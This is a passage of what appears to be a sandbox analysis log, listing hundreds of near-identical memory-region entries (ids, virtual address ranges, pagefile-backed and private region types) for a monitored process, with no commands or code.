0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5423 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5424 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5425 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5426 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5427 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5428 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5429 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5430 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5431 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5435 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5436 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5437 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5438 start_va = 0x2a0000 end_va = 
0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5439 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5440 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5441 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5442 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5443 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5444 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5445 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5446 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5447 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5448 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5449 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5450 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5451 start_va = 
0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5452 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5453 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5454 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5652 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 5653 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 5654 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 5655 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 5656 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5657 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5658 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5659 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5660 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5661 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5662 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5663 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5664 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5665 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5666 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5667 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5668 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5669 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5670 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5671 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5672 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5673 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 5674 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5675 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5676 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5677 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5678 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5679 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5680 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5681 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5682 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5683 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5684 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5685 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5710 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 5711 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5712 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5713 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5714 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5715 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5716 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5717 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5718 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5719 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5720 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5721 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5722 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5723 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5724 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5725 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5726 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5727 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5728 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 5729 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 5730 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 5731 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 5732 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5733 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5734 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5735 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5736 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5737 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5745 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5746 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5747 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5748 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5749 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5750 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5751 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5752 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5753 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5754 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5755 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5756 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5757 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5758 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5759 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5760 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5761 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5762 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5763 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5764 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5765 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5766 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5767 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5768 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5769 start_va = 0x2a0000 
end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5770 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5771 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5772 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5773 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5774 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5775 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5776 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5777 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5778 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5779 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5780 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5781 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5782 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5783 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5784 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5785 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5786 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5787 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5788 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5952 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 5953 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 5954 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 5955 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 5956 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5957 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: 
id = 5958 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5959 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5960 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5961 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5962 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5963 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5964 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5965 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5966 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5967 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5968 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5969 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5970 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 5971 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5972 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5973 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5974 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5975 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5976 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5977 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5978 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5979 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5980 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5981 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5982 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5983 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 5984 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5985 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5986 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5987 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5988 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5989 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5990 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5991 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5992 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5993 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5994 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5995 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5996 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5997 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5998 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5999 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6000 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6001 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6002 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6003 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6004 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6005 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 6006 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 6007 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 6008 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6009 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
